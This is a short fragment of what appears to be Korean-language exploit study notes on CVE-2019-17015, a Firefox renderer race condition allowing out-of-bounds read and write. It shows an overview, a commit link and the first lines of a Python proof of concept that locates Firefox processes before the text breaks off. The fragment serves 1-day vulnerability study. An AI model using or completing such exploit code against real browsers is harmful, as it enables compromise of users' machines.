0x03 1-day
CVE-2019-17015
Vulnerablity Overview firefox 렌더러 프로세스에서 race condition이 발생해서 oob read / write가 가능한 취약점 Version Firefox ESR < 68.4 and Firefox < 72. commit log : 02de40b998ca https://phabricator.services.mozilla.com/D54699?id=198344 PoC import windows import windows.winproxy import windows.generated_def as gdef ff_procs = [p for p in windows.system.processes if p.name == "firefox.exe"] ff_renderer = None for pr..
